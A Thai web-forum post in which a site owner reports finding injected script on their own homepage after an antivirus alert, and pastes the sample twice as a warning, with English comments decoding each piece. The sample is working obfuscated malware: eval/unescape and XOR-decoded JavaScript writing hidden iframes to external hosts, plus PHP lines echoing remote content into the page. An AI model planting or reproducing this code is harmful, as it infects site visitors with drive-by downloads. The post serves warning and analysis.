gooeasy
13-10-2007, 07:03 AM
วันนี้ลองเข้าไปในเว็บตัวเองเจอของดีเข้าให้ trojan โปรแกรมแจ้งเตือนขึ้นมาทันที แถมยังขึ้นให้โหลด activex outlook.exe เลยปิดหน้าเว็บทันทีแล้วเข้าไปดูไฟล์เว็บหน้าแรกก็เจอเลยมันเอาสคริปมาฝังไว้เรียบร้อยเวงจิงๆ อยากรู้ว่ามันเอามาฝังได้ยังไงเนี้ยน่ากลัวจริงๆ หรือมันอาศัยช่องโหว่ของจาวาสคริปที่ error อยู่บนหน้าเว็บแน่ๆ จากการสันนิษฐาน(เดาเอาเอง) หรือยังไงใครรู้บ้าง
เอาสคริปที่มันฝังไว้มาให้ดูเพื่อเป็นตัวอย่าง ใครมีโค้ดนี้ในไฟล์เว็บเพจไปเอาออกด่วน
<!-- Injected sample as pasted by the poster. Nothing here belongs to the site; every piece either
     writes a hidden iframe pointing at an external host or echoes remote content into the page.
     Only the payload is visible on this page; the write path that placed it in the file is not. -->
<!-- Piece 1: the %XX string is the source of a small helper d(s). Hand-decoded, d() walks its argument
     from the last character down to index 1 (index 0 is skipped), XORs each char code with 2, and
     document.write()s the result. The second unescape() argument is the encoded markup; it decodes to a
     1x1 iframe with style 'visibility: hidden' loading an external .php page (host appears to be
     winjex.org, decoded by hand, so verify before using it as an indicator). -->
<script Language="JavaScript">
// eval(unescape(...)) defines d(); the trailing d(unescape(...)) immediately runs it on the encoded iframe.
eval(unescape("%66%75%6E%63%74%69%6F%6E%20%64%28%73%29%7B%72%3D%6E%65%77%20%41%72%72%61%79%28%29%3B%74%3D%22%22%3B%6A%3D%30%3B%66%6F%72%28%69%3D%73%2E%6C%65%6E%67%74%68%2D%31%3B%69%3E%30%3B%69%2D%2D%29%7B%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%5E%32%29%3B%69%66%28%74%2E%6C%65%6E%67%74%68%3E%38%30%29%7B%72%5B%6A%2B%2B%5D%3D%74%3B%74%3D%22%22%7D%7D%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%72%2E%6A%6F%69%6E%28%22%22%29%2B%74%29%7D"));d(unescape("%08<gocpdk-><%259lgffkj"8{vknk`kqkt%25?gn{vq"%253%25?vjekgj"%253%25?jvfku"%25rjr,xz-epm,zgjlku--8rvvj%25?apq"gocpdk>"));
</SCRIPT>
<!-- Piece 2: plain %XX encoding. Decodes to an iframe with src http://303inc.pri.ee/xds/iframe.php,
     frameborder 0, width 0, height 0, so it renders nothing visible. -->
<script Language="JavaScript">
// Decoded by hand from the %XX string below; verify with unescape() in a sandbox before relying on it.
document.write(unescape("%3C%69%66%72%61%6D%65 %73%72%63%3D%22%68%74%74%70%3A%2F%2F%33%30%33%69%6E%63%2E%70%72%69%2E%65%65%2F%78%64%73%2F%69%66%72%61%6D%65%2E%70%68%70%22 %66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22 %77%69%64%74%68%3D%30 %68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%0A"));
</SCRIPT><?php
// Piece 3: server-side remote include. file_get_contents() on an http:// URL fetches whatever the
// remote host serves at request time and echo prints it unfiltered into the page, so the page body is
// controlled by that host even after the JavaScript above is removed. The same fetch is repeated
// several times (erordmas.info twice, doubler2007.com twice, gerbalaif.info twice).
echo file_get_contents("http://erordmas.info/test.txt");
?><?php
echo file_get_contents("http://erordmas.info/test.txt");
?><?php
echo file_get_contents("http://doubler2007.com/test.txt");
?><?php
echo file_get_contents("http://www.gerbalaif.info/tests.txt");
?><?php
echo file_get_contents("http://www.gerbalaif.info/tests.txt");
?><?php
echo file_get_contents("http://doubler2007.com/test.txt");
?><!-- Piece 4: %XX-encoded script. Hand-decoded it sets window.status='Done' and document.write()s an
     iframe named cd218b with src http://alltraff.ru/lol.php?<random number>1e, sized 689x406 but
     style 'display: none'. It is followed by an unencoded iframe to orentraff.cn/tds/index.php?out=1191410716
     with width 0, height 0 and display:none. --><script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%64%32%31%38%62%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%61%6c%6c%74%72%61%66%66%2e%72%75%2f%6c%6f%6c%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%37%39%37%33%34%29%2b%27%31%65%5c%27%20%77%69%64%74%68%3d%36%38%39%20%68%65%69%67%68%74%3d%34%30%36%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script><iframe src="http://orentraff.cn/tds/index.php?out=1191410716" width="0" height="0" style="display:none"></iframe>
<!-- Piece 5: \uXXXX-escaped string. Hand-decoded it writes an iframe with src
     http://trffc.org/tds/index.php?out=1191883523, width "0", height "0", style display:none.
     NOTE(review): in this first copy the string literal is broken across raw line breaks, which is not
     valid JavaScript; that looks like forum line-wrapping of the paste. The single-line copy that
     follows it is the same script unwrapped. -->
<script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065
\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0074\u0072
\u0066\u0066\u0063\u002e\u006f\u0072\u0067\u002f\u0074\u0064\u0073\u002f\u0069\u006e\u0064
\u0065\u0078\u002e\u0070\u0068\u0070\u003f\u006f\u0075\u0074\u003d\u0031\u0031\u0039\u0031
\u0038\u0038\u0033\u0035\u0032\u0033\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022
\u0030\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0030\u0022\u0020\u0073
\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079
\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065
\u003e')</script>
<!-- Same as piece 5, on one line (this is the form that actually executes). -->
<script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0074\u0072\u0066\u0066\u0063\u002e\u006f\u0072\u0067\u002f\u0074\u0064\u0073\u002f\u0069\u006e\u0064\u0065\u0078\u002e\u0070\u0068\u0070\u003f\u006f\u0075\u0074\u003d\u0031\u0031\u0039\u0031\u0038\u0038\u0033\u0035\u0032\u0033\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0030\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0030\u0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script>
เอาสคริปที่มันฝังไว้มาให้ดูเพื่อเป็นตัวอย่าง ใครมีโค้ดนี้ในไฟล์เว็บเพจไปเอาออกด่วน
<!-- This is a verbatim repeat of the injected sample already pasted earlier in the post (the forum
     page shows the same paste twice). Every piece writes a hidden iframe to an external host or echoes
     remote content into the page; only the payload is visible here, not how it was written into the file. -->
<!-- Piece 1: %XX-encoded helper d(s). Hand-decoded, it walks its argument from the last character down
     to index 1, XORs each char code with 2 and document.write()s the result; the second argument
     decodes to a 1x1 iframe with style 'visibility: hidden' loading an external .php page (host appears
     to be winjex.org, decoded by hand, so verify). -->
<script Language="JavaScript">
// eval(unescape(...)) defines d(); the trailing d(unescape(...)) runs it on the encoded iframe markup.
eval(unescape("%66%75%6E%63%74%69%6F%6E%20%64%28%73%29%7B%72%3D%6E%65%77%20%41%72%72%61%79%28%29%3B%74%3D%22%22%3B%6A%3D%30%3B%66%6F%72%28%69%3D%73%2E%6C%65%6E%67%74%68%2D%31%3B%69%3E%30%3B%69%2D%2D%29%7B%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%5E%32%29%3B%69%66%28%74%2E%6C%65%6E%67%74%68%3E%38%30%29%7B%72%5B%6A%2B%2B%5D%3D%74%3B%74%3D%22%22%7D%7D%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%72%2E%6A%6F%69%6E%28%22%22%29%2B%74%29%7D"));d(unescape("%08<gocpdk-><%259lgffkj"8{vknk`kqkt%25?gn{vq"%253%25?vjekgj"%253%25?jvfku"%25rjr,xz-epm,zgjlku--8rvvj%25?apq"gocpdk>"));
</SCRIPT>
<!-- Piece 2: decodes to an iframe with src http://303inc.pri.ee/xds/iframe.php, frameborder 0,
     width 0, height 0 (nothing visible is rendered). -->
<script Language="JavaScript">
// Hand-decoded from the %XX string; verify with unescape() in a sandbox.
document.write(unescape("%3C%69%66%72%61%6D%65 %73%72%63%3D%22%68%74%74%70%3A%2F%2F%33%30%33%69%6E%63%2E%70%72%69%2E%65%65%2F%78%64%73%2F%69%66%72%61%6D%65%2E%70%68%70%22 %66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22 %77%69%64%74%68%3D%30 %68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%0A"));
</SCRIPT><?php
// Piece 3: server-side remote include. file_get_contents() fetches the remote URL at request time and
// echo prints the response unfiltered into the page, so the remote host controls page content even with
// the JavaScript removed. The fetch is repeated: erordmas.info x2, doubler2007.com x2, gerbalaif.info x2.
echo file_get_contents("http://erordmas.info/test.txt");
?><?php
echo file_get_contents("http://erordmas.info/test.txt");
?><?php
echo file_get_contents("http://doubler2007.com/test.txt");
?><?php
echo file_get_contents("http://www.gerbalaif.info/tests.txt");
?><?php
echo file_get_contents("http://www.gerbalaif.info/tests.txt");
?><?php
echo file_get_contents("http://doubler2007.com/test.txt");
?><!-- Piece 4: hand-decoded, sets window.status='Done' and writes an iframe named cd218b with src
     http://alltraff.ru/lol.php?<random number>1e, 689x406 but style 'display: none'; followed by an
     unencoded 0x0 display:none iframe to orentraff.cn/tds/index.php?out=1191410716. --><script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%64%32%31%38%62%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%61%6c%6c%74%72%61%66%66%2e%72%75%2f%6c%6f%6c%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%37%39%37%33%34%29%2b%27%31%65%5c%27%20%77%69%64%74%68%3d%36%38%39%20%68%65%69%67%68%74%3d%34%30%36%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script><iframe src="http://orentraff.cn/tds/index.php?out=1191410716" width="0" height="0" style="display:none"></iframe>
<!-- Piece 5: \uXXXX-escaped string; hand-decoded it writes an iframe with src
     http://trffc.org/tds/index.php?out=1191883523, width "0", height "0", style display:none.
     NOTE(review): this copy has the string literal broken across raw line breaks (not valid JavaScript),
     most likely forum line-wrapping; the single-line copy below is the same script unwrapped. -->
<script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065
\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0074\u0072
\u0066\u0066\u0063\u002e\u006f\u0072\u0067\u002f\u0074\u0064\u0073\u002f\u0069\u006e\u0064
\u0065\u0078\u002e\u0070\u0068\u0070\u003f\u006f\u0075\u0074\u003d\u0031\u0031\u0039\u0031
\u0038\u0038\u0033\u0035\u0032\u0033\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022
\u0030\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0030\u0022\u0020\u0073
\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079
\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065
\u003e')</script>
<!-- Same as piece 5, on one line (the form that actually executes). -->
<script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0074\u0072\u0066\u0066\u0063\u002e\u006f\u0072\u0067\u002f\u0074\u0064\u0073\u002f\u0069\u006e\u0064\u0065\u0078\u002e\u0070\u0068\u0070\u003f\u006f\u0075\u0074\u003d\u0031\u0031\u0039\u0031\u0038\u0038\u0033\u0035\u0032\u0033\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0030\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0030\u0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script>